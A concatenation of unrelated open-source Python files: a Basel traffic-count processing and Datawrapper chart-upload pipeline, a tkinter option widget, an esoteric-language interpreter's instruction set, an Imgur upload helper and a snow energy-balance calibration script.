chartadminfn = 'normalavg_3m_chartadmin.csv'
coronatime = coronatime.drop(columns=['counter'])
filename = '../metaconfigs/normalcorona.json'
uploadaverages(site, thisdata, coronatime, filestring, namestring, folder, chartadminfn, updatedate, filename)
def rollingavgWD(data, chartadminfn='../chartadmin/rollingavg_3m_chartadmin.csv', folder=31911):
for site in data['SiteCode'].unique():
thisdata = data.loc[data['SiteCode'] == site].copy()
thisdata['Month'] = thisdata['Month'].astype(int)
thisdata['Day'] = thisdata['Day'].astype(int)
thisdata['Month'] = thisdata['Month'].apply(lambda x: '{0:0>2}'.format(x))
thisdata['Day'] = thisdata['Day'].astype(int).apply(lambda x: '{0:0>2}'.format(x))
thisdata = thisdata.sort_values(by=['Year', 'Month', 'Day']).reset_index(drop=True)
thisdata = thisdata.loc[thisdata['Weekday'] < 5]
thisdata['rollingavg'] = thisdata['Total'].rolling(3).mean()
thisdata['date'] = thisdata['Year'].astype(str) + '-' + thisdata['Month'].astype(str) + '-' + thisdata[
'Day'].astype(str)
thisdata['shortdate'] = thisdata['Month'].astype(str) + '-' + thisdata['Day'].astype(str)
newdata = pd.DataFrame(columns=['counter','date','Month', 'Day','2018', '2019', '2020'])
da2018 = pd.DataFrame(columns=['Month', 'Day', '2018'])
da2019 = pd.DataFrame(columns=['Month', 'Day', '2019'])
da2020 = pd.DataFrame(columns=['Month', 'Day', '2020'])
da2018['Month'] = thisdata.loc[thisdata['Year'] == 2018]['Month']
da2018['Day'] = thisdata.loc[thisdata['Year'] == 2018]['Day']
da2018['2018'] = thisdata.loc[thisdata['Year'] == 2018]['rollingavg']
da2018['counter'] = range(len(da2018))
da2019['Month'] = thisdata.loc[thisdata['Year'] == 2019]['Month']
da2019['Day'] = thisdata.loc[thisdata['Year'] == 2019]['Day']
da2019['2019'] = thisdata.loc[thisdata['Year'] == 2019]['rollingavg']
da2019['counter'] = range(len(da2019))
da2020['Month'] = thisdata.loc[thisdata['Year'] == 2020]['Month']
da2020['Day'] = thisdata.loc[thisdata['Year'] == 2020]['Day']
da2020['2020'] = thisdata.loc[thisdata['Year'] == 2020]['rollingavg']
da2020['date'] = thisdata.loc[thisdata['Year'] == 2020]['shortdate']
da2020['counter'] = range(len(da2020))
newdata = pd.merge(da2018[['counter', '2018']], da2019[['2019', 'counter']], how='outer',
on=['counter']).reset_index(drop=True)
newdata = pd.merge(newdata, da2020[['2020', 'counter', 'date']], how='outer', on=['counter']).reset_index(
drop=True)
# newdata = newdata.sort_values(by=['Month', 'Day'])
# da2020['date'] = da2020[['Month', 'Day']].agg('-'.join, axis=1)
# newdata = newdata.drop(columns = ['Month', 'Day'])
filestring = 'rollingavgWD_' + thisdata['TrafficType'].iloc[0] + '_' + thisdata['SiteName'].iloc[0].replace(' ',
'').replace(
'/', '')
if thisdata['TrafficType'].iloc[0] == 'Velo':
namestring = 'Anzahl ' + thisdata['TrafficType'].iloc[0] + 's bei ' + thisdata['SiteName'].iloc[0][4:]
elif thisdata['TrafficType'].iloc[0] == 'MIV':
namestring = 'MIV Verkehr bei ' + thisdata['SiteName'].iloc[0][4:]
else:
namestring = 'Anzahl ' + thisdata['TrafficType'].iloc[0] + ' bei ' + thisdata['SiteName'].iloc[0][4:]
coordinates = thisdata.loc[thisdata['Geo Point'].notna()]['Geo Point'].unique().astype(str)
stationstring = thisdata['SiteName'].iloc[0][4:]
updatedate = str(max(thisdata['date']))
coronatime = newdata.loc[(newdata['counter'] > 40) & (newdata['counter'] < sum(~np.isnan(newdata['2020'])))]
coronatime = coronatime.drop(columns=['counter'])
filename = '../metaconfigs/rollingcorona.json'
uploadaverages(site, thisdata, coronatime, filestring, namestring, folder, chartadminfn, updatedate, filename,
stationstring, coordinates)
def calendarweeks(bpdata, mivdata, ptdata):
# add calendar weeks to entries
bpdata['iso_week_number'] = bpdata.apply(
lambda x: date(int(x['Year']), int(x['Month']), int(x['Day'])).isocalendar()[1], axis=1)
mivdata['iso_week_number'] = mivdata.apply(
lambda x: date(int(x['Year']), int(x['Month']), int(x['Day'])).isocalendar()[1], axis=1)
# group by traffic type and calendar week
weekly_bp = pd.DataFrame(columns=['TrafficType', 'iso_week_number', 'Year', 'Month', 'Day', 'Total'])
weekly_bp = bpdata.groupby(['TrafficType', 'Year', 'iso_week_number']).agg(
{
'Total': 'sum',
'SiteCode': 'count',
'Month': 'first',
'Day': 'first'
}
)
# rename number of observations
weekly_bp = weekly_bp.rename(columns={'SiteCode': 'n_observations'})
# same for miv data
weekly_miv = pd.DataFrame(columns=['TrafficType', 'iso_week_number', 'Year', 'Month', 'Day', 'Total'])
weekly_miv = mivdata.groupby(['TrafficType', 'Year', 'iso_week_number']).agg(
{
'Total': 'sum',
'SiteCode': 'count',
'Month': 'first',
'Day': 'first'
}
)
# rename number of observations
weekly_miv = weekly_miv.rename(columns={'SiteCode': 'n_observations'})
# Adjust Public Transport Data
ptdata = ptdata.sort_values(by='Kalenderwoche')
ptdata['Year'] = ptdata.apply(
lambda x: int(str(x['Startdatum Woche'])[:4]), axis=1)
ptdata['Month'] = ptdata.apply(
lambda x: int(str(x['Startdatum Woche'])[5:7]), axis=1)
ptdata['Day'] = ptdata.apply(
lambda x: int(str(x['Startdatum Woche'])[8:10]), axis=1)
weekly_bp_raw = weekly_bp.copy()
weekly_miv_raw = weekly_miv.copy()
# uncertain = weekly_bp.loc[(weekly_bp['n_observations'] < 100) & (weekly_bp[ > 6]])]['n_observations']
# uncertain0 = max(uncertain)
# uncertain1 = min(weekly_bp.loc[(weekly_bp['n_observations'] < 100) & (weekly_bp.index > 6)]['n_observations'])
## Threshold anzahl observations
weekly_bp = weekly_bp.loc[weekly_bp['n_observations'] >= 100]
weekly_miv = weekly_miv.loc[weekly_miv['n_observations'] >= 180]
# relabel tables for DataWrapper upload
ptdata = ptdata.drop(columns='Startdatum Woche')
ptdata = ptdata.rename(columns={'Kalenderwoche': 'iso_week_number', 'Fahrgäste (Einsteiger)': 'Total'})
ptdata['TrafficType'] = 'BVB'
ptdata = ptdata.set_index(['TrafficType', 'Year', 'iso_week_number'])
weekly_developments_raw = pd.concat([weekly_bp_raw, weekly_miv_raw, ptdata], ignore_index=False)
weekly_developments = pd.concat([weekly_bp, weekly_miv, ptdata], ignore_index=False)
total_weekly_traffic = weekly_developments.groupby(['Year', 'iso_week_number']).agg(
{
'Total': 'sum',
'Month': 'first',
'Day': 'first'
}
)
weekly_developments_raw.to_csv('../data/weekly_totals_traffictype_raw.csv')
weekly_developments.to_csv('../data/weekly_totals_traffictype.csv')
total_weekly_traffic.to_csv('../data/weekly_total_traffic.csv')
# remove number of observations
weekly_developments = weekly_developments.drop(columns='n_observations')
weekly_miv = weekly_miv.reset_index()
weekly_bp = weekly_bp.reset_index()
ptdata = mivdata.reset_index()
weekly_developments = weekly_developments.drop(columns=['Day', 'Month'])
weekly_upload = weekly_developments.unstack(level=0)
weekly_upload = weekly_upload.reset_index()
weekly_upload = weekly_upload.iloc[:, :6]
weekly_upload.columns = weekly_upload.columns.to_flat_index()
weekly_upload.columns = ['Year', 'Wochennummer', 'BVB', 'Fussgänger', 'MIV', 'Velo']
weekly_backup = weekly_upload
weekly_upload = weekly_upload.loc[weekly_upload['Year'] == 2020]
weekly_upload = weekly_upload.loc[weekly_upload['Wochennummer'] > 6]
weekly_upload = weekly_upload.drop(columns=['Year'])
weekly_upload = weekly_upload[['Wochennummer', 'MIV', 'BVB', 'Velo', 'Fussgänger']]
weekly_upload.to_csv('../data/weekly_totals_traffictype_upload.csv', index=False)
print('Tabelle für Upload gespeichert')
dk.updatedwchart(id='Uy7qm', data=weekly_upload,
updatedate='Kalenderwoche ' + str(max(weekly_upload['Wochennummer'])), folder=31844,
title='Verkehrsmessungen Basel-Stadt')
print('Tabelle hochgeladen')
# Anpassung Wochennummer für Datawrapper
weekly_backup['Wochennummer'] = weekly_backup['Year'].astype(str) + 'W' + weekly_backup['Wochennummer'].astype(str)
weekly_velo = weekly_backup[['Year', 'Wochennummer', 'Velo']]
weekly_velo_2020 = weekly_velo.loc[weekly_velo['Year'] == 2018].drop(columns=['Year'])
# Upload Velodate
dk.updatedwchart(id='ve91z', data=weekly_velo_2020, title='Veloverkehr Basel-Stadt 2020',
updatedate='Kalenderwoche ' + str(max(weekly_upload['Wochennummer'])), folder=31844)
dk.updatedwchart(id='ZxeOW', data=weekly_velo, title='Veloverkehr 2017 - 2020',
updatedate='Kalenderwoche ' + str(max(weekly_upload['Wochennummer'])), folder=31844)
weekly_velo.to_csv('../data/weekly_velo.csv, index=False')
print('Velo Fertig')
#Upload MIV daten
weekly_miv = weekly_backup[['Year', 'Wochennummer', 'MIV']]
weekly_miv_2020 = weekly_miv.loc[weekly_velo['Year'] == 2020].drop(columns=['Year'])
dk.updatedwchart(id='Qas0c', data=weekly_miv_2020, title='MIV in Basel-Stadt 2020',
updatedate='Kalenderwoche ' + str(max(weekly_upload['Wochennummer'])), folder=31844)
weekly_velo.to_csv('../data/weekly_velo.csv, index=False')
print('MIV Fertig')
def uploadaverages(site, thisdata, newdata, filestring, namestring, folder, chartadminfn, updatedate, filename,
stationstring, coordinates=0):
if os.path.exists(f'{chartadminfn}'):
charts = pd.read_csv(f'{chartadminfn}', index_col=False)
if site in charts['SiteCode'].unique():
thischart = charts.loc[charts['SiteCode'] == site].copy()
id = thischart['dwid'].iloc[0]
jsondata = dk.updatedwchart(id, newdata, title=namestring, updatedate=updatedate, folder=folder)
thischart['title'] = namestring
thischart['stationstring'] = stationstring
thischart['embedcode'] = jsondata['metadata']['publish']['embed-codes']['embed-method-responsive']
thischart['url'] = 'https://datawrapper.dwcdn.net' + jsondata['url'][10:]
if updatedate[:7] != '2020-10':
thischart['ignore'] = 1
else:
thischart['ignore'] = 0
thischart['coordinates'] = coordinates.astype(str)
dk.updatemetadata(id, filename)
charts.loc[charts['SiteCode'] == site] = thischart
print(thischart['title'].iloc[0] + ' update erfolgreich')
charts.to_csv(f'{chartadminfn}', index=False)
else:
title = namestring
id = dk.createDWChart(title)
app = {'SiteCode': site, 'dwid': id, 'title': title, 'coordinates': coordinates,
'stationstring': stationstring}
updatedate = str(max(thisdata['Date']))
dk.updatemetadata(id, filename)
jsondata = dk.updatedwchart(id, newdata, title=namestring, updatedate=updatedate, folder=folder)
app['embedcode'] = jsondata['metadata']['publish']['embed-codes']['embed-method-responsive']
app['url'] = 'https://datawrapper.dwcdn.net' + jsondata['url']
if updatedate[:7] != '2020-10':
app['ignore'] = 1
charts = charts.append(app, ignore_index=True)
print(title + f' neu erstellt {id} und in chartadmin eingetragen')
charts.to_csv(f'{chartadminfn}', index=False)
newdata.to_csv(f'../data/stations/corona_{filestring}.csv')
else:
sys.exit(f'No chartadmin file found - check if {chartadminfn} exists')
def monthlyaverages(data):
for site in data['SiteCode'].unique():
thisdata = data.loc[data['SiteCode'] == site].copy()
thisdata.sort_values(by=['Year', 'Month'])
filestring = thisdata['TrafficType'].iloc[0] + '_' + thisdata['SiteName'].iloc[0].replace(' ', '').replace('/',
'')
namestring = thisdata['TrafficType'].iloc[0] + ' - ' + thisdata['SiteName'].iloc[0][4:]
filename = '../metaconfigs/dailies.json'
if os.path.exists('../chartadmin/monthly_chartadmin.csv'):
charts = pd.read_csv('../chartadmin/monthly_chartadmin.csv', index_col=False)
if site in charts['SiteCode'].unique():
thischart = charts.loc[charts['SiteCode'] == site].copy()
id = thischart['dwid'].iloc[0]
updatedate = str(max(thisdata['Date']))
jsondata = dk.updatedwchart(id, thisdata, title=namestring, updatedate=updatedate)
dk.updatemetadata(id, filename)
print(thischart['title'].iloc[0] + ' update erfolgreich')
else:
title = namestring
id = dk.createDWChart(title)
app = {'SiteCode': site, 'dwid': id, 'title': title}
charts = charts.append(app, ignore_index = True)
print(title + f' neu erstellt {id} und in chartadmin eingetragen')
updatedate = str(max(thisdata['Date']))
dk.updatemetadata(id, filename)
jsondata = dk.updatedwchart(id,thisdata,updatedate)
print(title + ' update erfolgreich')
charts.to_csv('monthly_chartadmin.csv', index=False)
else:
sys.exit('No chartadmin file found - check if monthly_chartadmin.csv exists')
thisdata.to_csv(f'../data/stations/{filestring}.csv')
def test_monthly():
data = pd.read_csv('../data/monthlyavg.csv')
monthlyaverages(data)
def test_rolling_avg():
data = pd.read_csv('../data/dailiesnew.csv')
data2 = pd.read_csv('../data/dailies_MIV.csv')
rollingavgWD(data)
rollingavgWD(data=data2, chartadminfn='../chartadmin/MIV_rollingavg_3m_chartadmin.csv', folder=43121)
print('Abgeschlossen')
def test_daily_avg():
data = pd.read_csv('../data/dailiesnew.csv')
normalavgWD(data)
print('Abgeschlossen')
# test_rolling_avg()
# test_weekly_comparisons()
# test_rolling_avg()
# test_monthly()
#BVB datensatz https://data.bs.ch/explore/dataset/100075/download/?format=csv&timezone=Europe/Berlin&lang=de&use_labels_for_header=true&csv_separator=%3B
```
#### File: trafficbs/trafficbs/script.py
```python
import csv
import json
from datetime import datetime
import pandas as pd
import requests
from tests import test_weekly_data
from trafficbs import buildlinkmap
from trafficbs import datakicker
from trafficbs import datapreps
from trafficbs import processing
now = datetime.now()
def dailyupdate(legacyfile='data/dailiesnew.csv', dataset_id=100013):
# import existing dataset
legacy = pd.read_csv(legacyfile)
legacy = legacy.loc[legacy['Year'] > 2017]
legacydate = []
for date in legacy.iterrows():
legacydate.append(datetime.strptime(date[1]['Date'], '%d.%m.%Y'))
maxtime = max(legacydate)
datecode = datetime.strftime(maxtime, '%Y-%m-%dT%h%m')
print(datecode)
# 2020-05-07T23%3A00%3A00%2B00.00
data = gatherBS(dataset_id)
dataagg = pd.DataFrame()
for entry in data:
dataagg = dataagg.append(entry['fields'], ignore_index=True)
dataagg.sort_values(by=['year', 'month', 'day'])
dataagg.to_csv('data/poll_' + datetime.strftime(datetime.now(), '%y%m%d.csv'))
dataagg = dataagg.loc[dataagg['datetimefrom'] >= datecode]
datasums = sumdata(dataagg)
aggregate = pd.concat([legacy, datasums], ignore_index=True)
aggregate.drop_duplicates(subset=['SiteCode', 'Date', 'Total', 'TrafficType'])
aggregate.to_csv(legacyfile)
print('csv gespeichert ab ' + str(datecode[:10]) + ' neue Einträge ' + str(len(datasums)))
return dataagg
def sumdata(data):
groups = pd.DataFrame()
groups = data.groupby(['sitecode', 'date']).agg(
{
'total': sum,
'sitename': 'first',
'valuesapproved': 'last',
'traffictype': 'first',
'year': 'first',
'month': 'first',
'day': 'first',
'weekday': 'first',
'geo_point_2d': 'last'
})
groups = groups.reset_index(drop=False)
groups['Geo Point'] = ' '
groups['Geo Point'] = [','.join(map(str, l)) for l in groups['geo_point_2d']]
# groups['Geo Point'].join(groups['geo_point_2d'])
groups.drop('geo_point_2d', axis=1)
groups.rename(columns={'total': 'Total', 'sitecode': 'SiteCode', 'sitename': 'SiteName', 'date': 'Date',
'valuesapproved': 'ValuesApproved', 'traffictype': 'TrafficType', 'year': 'Year',
'month': 'Month', 'day': 'Day', 'weekday': 'Weekday'}, inplace=True)
groups = groups[
['SiteCode', 'Date', 'Total', 'SiteName', 'ValuesApproved', 'TrafficType', 'Year', 'Month', 'Day', 'Weekday',
'Geo Point']]
return groups
def gatherBS(id):
response = requests.get(
f'https://data.bs.ch/api/records/1.0/search/?dataset={id}&q=&rows=5000&sort=datetimefrom'
)
resp = json.loads(response.text)
print('Daten geholt')
resp1 = resp['records']
return resp1
def addData(data,filename,recent):
with open(f'data/{filename}', 'r') as fileread:
existingLines = [line for line in csv.reader(fileread)]
with open (f'data/{recent}', 'r') as recentdata:
reader2 = csv.reader(recentdata)
for row in reader2:
if row not in existingLines:
print('NEWentry')
with open(f'data/{filename}', 'a') as dbfile:
appender = csv.writer(dbfile)
appender.writerow(row)
dbfile.close()
fileread.close()
recentdata.close()
def writeCSVinit(data, filename):
file = open(f'data/{filename}', 'w')
csvwriter = csv.writer(file)
count = 0
for i in data:
if count == 0:
header = i['fields'].keys()
csvwriter.writerow(header)
count+=1
csvwriter.writerow(i['fields'].values())
file.close()
print('CSV ' + filename + ' geschrieben')
def addTimestamp(filename):
add = now.strftime("%y%m%d_%H%M%S")
filename = filename + '_' + add
return filename
def writeCSVcont(data, filename):
filename = addTimestamp(filename) + '.csv'
file = open(f'data/{filename}', 'w')
csvwriter = csv.writer(file)
count = 0
for i in data:
if count == 0:
header = data[1].keys()
csvwriter.writerow(header)
count+=1
csvwriter.writerow(i.values())
file.close()
return filename
# data = gatherBS(100013)
# writeCSVinit(data, 'rawdata_now.csv')
# recent = writeCSVcont(data, 'trafficdata.csv')
# addData(data,'evchargers.csv', recent)
# print('Neue Tabelle geschrieben: ' + recent)
# dailyupdate()
# dailyupdate('data/dailies_MIV.csv', dataset_id=100006)
# neue Datensätze laden (komplett)
datapreps.csvpoll(bsid=100006, filename='../data/MIV_newpoll.csv')
datapreps.csvpoll(bsid=100013, filename='../data/bp_newpoll.csv')
datapreps.csvpoll(bsid=100075, filename='../data/pt_newpoll.csv')
mivtotals = datapreps.loaddata(filename='../data/MIV_newpoll.csv', histfilename='../data/200531_MIVhist.csv',
savename='../data/dailies_MIV.csv', histdata=True)
bptotals = datapreps.loaddata(filename='../data/bp_newpoll.csv', histfilename='../data/200510_download_hist.csv',
savename='../data/dailiesnew.csv', histdata=True)
# Berechnungen einzelne Stationen
processing.test_rolling_avg()
# Wochenvergleiche generieren
test_weekly_data.test_weekly_comparisons()
# Linkmap Velo bauen
buildlinkmap.addMarkers(datakicker.getChartData('ZOd9a'), '../chartadmin/rollingavg_3m_chartadmin.csv', dwid='Z0d9a')
# Linkmap MIV bauen
buildlinkmap.addMarkers(datakicker.getChartData('BBxPZ'), '../chartadmin/MIV_rollingavg_3m_chartadmin.csv',
dwid='BBxPZ')
print('Skript ist bis zum Ende durchgelaufen')
``` |
{
"source": "JonoCode9374/BreezyUI",
"score": 3
} |
#### File: BreezyUI/Libraries/Option.py
```python
import tkinter
attributes_area = None
class Option:
row = 0
def __init__(self, name, config_name, attr_var, widget_type, applicable_widgets, *args, **kwargs):
'''
Takes:
- self
- name [str] -- The name of this option
- config_name [str] -- The config attribute this affects
- attr_var [str] -- The variable which the attribute is stored in
- widget_type [str] -- The type of widget this option is
- applicable_widgets [[str]] -- The widgets this option shows for
- **kwargs -- The arguments to construct the widget
Does:
- Initalises this instance of option
Returns:
- None
'''
self.name = name
self.attribute = config_name
self.var = attr_var
#Create the label and widget for this option
self.label = tkinter.Label(attributes_area, text=name)
construction = "tkinter.{0}(attributes_area".format(widget_type)
if args:
args = ", ".join([str(x) for x in args])
construction = "{0}, {1}".format(construction, args)
#At this point, construction would equal something like this:
#tkinter.widget_type(attributes_area, args
if kwargs:
kwargs = ', '.join([str(x) + '=' + kwargs[x] for x in kwargs])
construction = "{0}, {1}".format(construction, kwargs)
#If the args wasn't empty, construction would look like this: tkinter.widget_type(attributes_area, args, kwargs
construction += ")"
self.option = eval(construction)
self.x = Option.row
Option.row += 1
self.widgets = applicable_widgets
def show(self, widget_type):
'''
Takes:
- self
- widget_type [str] -- The type of widget being shown
Does:
- Shows the widget in the appropriate location if it is for a widget it supports
Returns:
- None
'''
if widget_type in self.widgets:
if self.name == "Display Text":
self.option.delete(0, tkinter.END)
self.option.insert(0, target_widget.cget("text"))
elif self.name == "Background Colour":
self.option["text"] = target_widget.cget("bg")
elif self.name == "Border Colour":
self.option["text"] = target_widget.cget("highlightbackground")
self.label.grid(row=self.x, column=0)
self.option.grid(row=self.x, column=1)
def hide(self):
'''
Takes:
- self
Does:
- Hides the widget using `.grid_forget()`
Returns:
- None
'''
self.label.grid_forget()
self.option.grid_forget()
``` |
{
"source": "JonoCode9374/International-Phonetic-Esoteric-Language",
"score": 4
} |
#### File: International-Phonetic-Esoteric-Language/src/instructions.py
```python
def LITERAL(instruction, stack):
if (str.isdigit(instruction)):
stack.push(int(instruction))
else:
stack.push(instruction)
def STACK(instruction, stack):
if instruction in 'c':
stack.pop()
elif instruction in 'ɟ':
stack.push(stack.peek())
elif instruction in 'ɲ':
a = stack[0]
b = stack[-1]
stack[0] = b
stack[-1] = a
elif instruction in 'ç':
stack.push(len(stack))
elif instruction in 'ʝ':
stack.push(stack[stack.pop()])
elif instruction in 'j':
a = stack.pop()
for i in range(a, 0, -1):
stack.push(stack.stack.pop(0))
elif instruction in 'ʎ':
ints, strs = [], []
while not stack.isEmpty():
ele = stack.pop()
if isinstance(ele, int):
ints.append(ele)
else:
strs.append(ele)
ints.sort()
strs.sort()
ints.append(strs)
for i in ints:
stack.push(i)
stack.stack.reverse()
def STRING(instruction, stack):
if instruction in 'q':
a = stack.pop()
b = stack.pop()
stack.push(a + b)
elif instruction in 'ɢ':
stack.push(len(str(stack.peek())))
elif instruction in 'ʀ':
for c in stack.pop():
stack.push(ord(c))
elif instruction in 'ʁ':
a = str(list(str(stack.pop())).reverse())
for c in a:
stack.push(c)
elif instruction in 'ɴ':
a = stack.pop()
b = stack.pop()
stack.push(a[b])
elif instruction in 'χ':
stack.push(chr(stack.pop()))
def MATH(instruction, stack):
import math as m
if instruction in 't':
stack.push(stack.pop() + stack.pop())
elif instruction in 'd':
stack.push(stack.pop() - stack.pop())
elif instruction in 'θ':
stack.push(stack.pop() * stack.pop())
elif instruction in 'ð':
a = stack.pop()
b = stack.pop()
if (b == 0):
stack.push(0)
else:
stack.push(a / b)
elif instruction in 'n':
stack.push(stack.pop() % stack.pop())
elif instruction in 'ʃ':
stack.push(stack.pop() ** stack.pop())
elif instruction in 'ʒ':
stack.push(m.log(stack.pop(), stack.pop()))
elif instruction in 's':
stack.push(stack.pop() + stack.pop())
elif instruction in 'z':
stack.push(stack.pop() >> stack.pop())
elif instruction in 'r':
stack.push(stack.pop() << stack.pop())
elif instruction in 'ɾ':
stack.push(stack.pop() & stack.pop())
elif instruction in 'ɹ':
stack.push(stack.pop() | stack.pop())
elif instruction in 'l':
stack.push(~stack.pop())
elif instruction in 'ɬ':
stack.push(-stack.pop())
elif instruction in 'ɮ':
stack.push(round(stack.pop()))
def LOGICAL(instruction, stack):
if instruction in 'ʈ':
a = stack.pop()
b = stack.pop()
if (a == ''):
stack.push(0)
return
if (b == ''):
stack.push(1)
return
if (a > b):
stack.push(1)
else:
stack.push(0)
elif instruction in 'ɖ':
a = stack.pop()
b = stack.pop()
if (a == ''):
stack.push(1)
return
if (b == ''):
stack.push(0)
return
if (a < b):
stack.push(0)
else:
stack.push(1)
elif instruction in 'ʂ':
a = stack.pop()
b = stack.pop()
if (a == ''):
stack.push(0)
return
if (b == ''):
stack.push(1)
return
if (a >= b):
stack.push(1)
else:
stack.push(0)
elif instruction in 'ʐ':
a = stack.pop()
b = stack.pop()
if (a == ''):
stack.push(1)
return
if (b == ''):
stack.push(0)
return
if (a <= b):
stack.push(0)
else:
stack.push(1)
elif instruction in 'ɳ':
a = stack.pop()
b = stack.pop()
if (a == b):
stack.push(1)
else:
stack.push(0)
elif instruction in 'ɽ':
a = stack.pop()
b = stack.pop()
if (a == '' or a <= 0):
a = False
else:
a = True
if (b == '' or b <= 0):
b = False
else:
b = True
if (a and b):
stack.push(1)
else:
stack.push(0)
elif instruction in 'ɻ':
a = stack.pop()
b = stack.pop()
if (a == '' or a <= 0):
a = False
else:
a = True
if (b == '' or b <= 0):
b = False
else:
b = True
if (a or b):
stack.push(1)
else:
stack.push(0)
elif instruction in 'ɭ':
a = stack.pop()
if (a == '' or a <= 0):
stack.push(0)
else:
stack.push(1)
def IO(instruction, stack):
if instruction in 'ɪ':
temp = input()
if temp.isnumeric():
stack.push(int(temp))
elif temp[0] == '-' and temp[1:].isnumeric():
stack.push(int(temp))
else:
for c in temp:
stack.push(ord(c))
elif instruction in 'i':
stack.push(input())
elif instruction in 'o':
print(str(stack.pop()))
``` |
{
"source": "jonoco/fumblr",
"score": 3
} |
#### File: fumblr/services/imgur.py
```python
from fumblr.keys import IMGUR_SECRET, IMGUR_ID
from imgurpython import ImgurClient, helpers
import os
import base64
API_URL = 'https://api.imgur.com/3/'
def get_client():
"""
Get an API client for Imgur
Returns:
Imgur client if it is available
"""
try:
return ImgurClient(IMGUR_ID, IMGUR_SECRET)
except helpers.error.ImgurClientError:
print(f'Error: imgur client error - id: {IMGUR_ID} secret: {IMGUR_SECRET}')
def delete_image(deletehash):
"""
Delete image from Imgur with given deletehash
Args:
deletehash: Hash id of image to delete
Returns:
Response from Imgur of image deletion if successful, otherwise False
"""
client = get_client()
if client:
try:
return client.delete_image(deletehash)
except:
return False
def upload_image(path):
"""
Upload image at system path to Imgur
Example of response data from Imgur upload:
{'size': 3527,
'title': None,
'animated': False,
'deletehash': 'YkK79ucEtDDn1b9',
'views': 0,
'width': 187,
'account_url': None,
'in_gallery': False,
'name': '',
'section': None,
'account_id': 0,
'type': 'image/png',
'datetime': 1473926225,
'description': None,
'height': 242,
'bandwidth': 0,
'id': 'AEvnA7h',
'favorite': False,
'nsfw': None,
'link': 'http://i.imgur.com/AEvnA7h.png',
'is_ad': False,
'vote': None}
Args:
path: System path of image
Returns:
Response from Imgur
"""
client = get_client()
if client:
image_path = os.path.abspath(path)
upload = client.upload_from_path(image_path)
return upload
def upload(image):
"""
Upload image to Imgur from file
Args:
image: File object
Returns:
Imgur response object
"""
client = get_client()
if client:
contents = image.read()
b64 = base64.b64encode(contents)
data = {
'image': b64,
'type': 'base64'
}
return client.make_request('POST', 'upload', data, True)
def upload_from_url(url):
"""
Upload image to Imgur from url
Args:
url: URL of image
Returns:
Imgur Response object if successful, otherwise False
"""
client = get_client()
if client:
try:
return client.upload_from_url(url)
except helpers.error.ImgurClientError:
print('Error: imgur client error')
return False
def get_image(id):
"""
Return image data for image with given id
Args:
id: Imgur image id
Returns:
Response from Imgur
"""
client = get_client()
if client:
image_data = client.get_image(id)
return image_data
``` |
{
"source": "jonoconway/nz_snow_tools",
"score": 2
} |
#### File: nz_snow_tools/eval/brewster_calibration_TF.py
```python
from __future__ import division
import numpy as np
import matplotlib.pylab as plt
import datetime as dt
from nz_snow_tools.util.utils import resample_to_fsca, nash_sut, mean_bias, rmsd, mean_absolute_error, coef_determ
seb_dat = np.genfromtxt(
'S:\Scratch\Jono\Final Brewster Datasets\SEB_output\cdf - code2p0_MC_meas_noQPS_single_fixed output_fixed_B\modelOUT_br1_headings.txt', skip_header=3)
sw_net = seb_dat[:, 14 - 1]
lw_net = seb_dat[:, 17 - 1]
qs = seb_dat[:, 19 - 1]
ql = seb_dat[:, 20 - 1]
qc = seb_dat[:, 21 - 1]
qprc = seb_dat[:, 22 - 1]
qst = seb_dat[:, 24 - 1]
qm = seb_dat[:, 25 - 1]
t_dep_flux = lw_net + qs + ql + qc + qst
qm_wo_sw_prc = qm - sw_net - qprc
qm_wo_sw_prc[(qm == 0)] = 0
ta = seb_dat[:, 8 - 1]
ea = seb_dat[:, 10 - 1]
ws = seb_dat[:, 7 - 1]
r2_ea = coef_determ(qm_wo_sw_prc, ea)
r2_ta = coef_determ(qm_wo_sw_prc, ta)
r2_ea_ws = coef_determ(qm_wo_sw_prc, ea*ws)
r2_ea_pos = coef_determ(qm_wo_sw_prc[(qm_wo_sw_prc > 0)], ea[(qm_wo_sw_prc > 0)])
r2_ta_pos = coef_determ(qm_wo_sw_prc[(qm_wo_sw_prc > 0)], ta[(qm_wo_sw_prc > 0)])
r2_ea_ws_pos = coef_determ(qm_wo_sw_prc[(qm_wo_sw_prc > 0)], ea[(qm_wo_sw_prc > 0)]*ws[(qm_wo_sw_prc > 0)])
print(r2_ea)
print(r2_ta)
print (r2_ea_ws)
print(r2_ea_pos)
print(r2_ta_pos)
print (r2_ea_ws_pos)
print(
np.sum(ta>0),
np.sum(np.logical_and(ta>0,qm_wo_sw_prc > 0)),
np.sum(qm_wo_sw_prc > 0),
np.sum(np.logical_and(ta>0,qm_wo_sw_prc > 0))/np.sum(ta>0),
)
print(
np.sum(ea>6.112),
np.sum(np.logical_and(ea>6.1120,qm_wo_sw_prc > 0)),
np.sum(qm_wo_sw_prc > 0),
np.sum(np.logical_and(ea>6.1120,qm_wo_sw_prc > 0))/np.sum(ea>6.112),
)
plt.figure()
plt.hexbin(qm_wo_sw_prc[(qm_wo_sw_prc > 0)], ta[(qm_wo_sw_prc > 0)], cmap=plt.cm.inferno_r)
plt.plot(range(200), np.arange(200) / 14.7,'k')
plt.plot(range(100), np.arange(100) / 8.7,'r')
plt.xlabel('QM - SWnet - Qprecip')
plt.ylabel('Air temperature (C)')
plt.savefig(r'D:\Snow project\Oct2018 Results\qm_wo_sw_prc vs ta posQM.png')
plt.figure()
plt.hexbin(qm_wo_sw_prc[(qm_wo_sw_prc > 0)], ea[(qm_wo_sw_prc > 0)], cmap=plt.cm.inferno_r)
plt.plot(range(200), 6.112 + np.arange(200) / 42.0,'k')
plt.xlabel('QM - SWnet - Qprecip')
plt.ylabel('Vapour pressure (hPa)')
plt.savefig(r'D:\Snow project\Oct2018 Results\qm_wo_sw_prc vs ea posQM.png')
plt.figure()
plt.hexbin(qm_wo_sw_prc[~(qm_wo_sw_prc == 0)], ta[~(qm_wo_sw_prc == 0)], cmap=plt.cm.inferno_r)
plt.plot(range(200), np.arange(200) / 14.7,'k')
plt.plot(range(100), np.arange(100) / 8.7,'r')
plt.xlabel('QM - SWnet - Qprecip')
plt.ylabel('Air temperature (C)')
plt.savefig(r'D:\Snow project\Oct2018 Results\qm_wo_sw_prc vs ta.png')
plt.figure()
plt.hexbin(qm_wo_sw_prc[~(qm_wo_sw_prc == 0)], ea[~(qm_wo_sw_prc == 0)], cmap=plt.cm.inferno_r)
plt.plot(range(200), 6.112 + np.arange(200) / 42.0,'k')
plt.xlabel('QM - SWnet - Qprecip')
plt.ylabel('Vapour pressure (hPa)')
plt.savefig(r'D:\Snow project\Oct2018 Results\qm_wo_sw_prc vs ea.png')
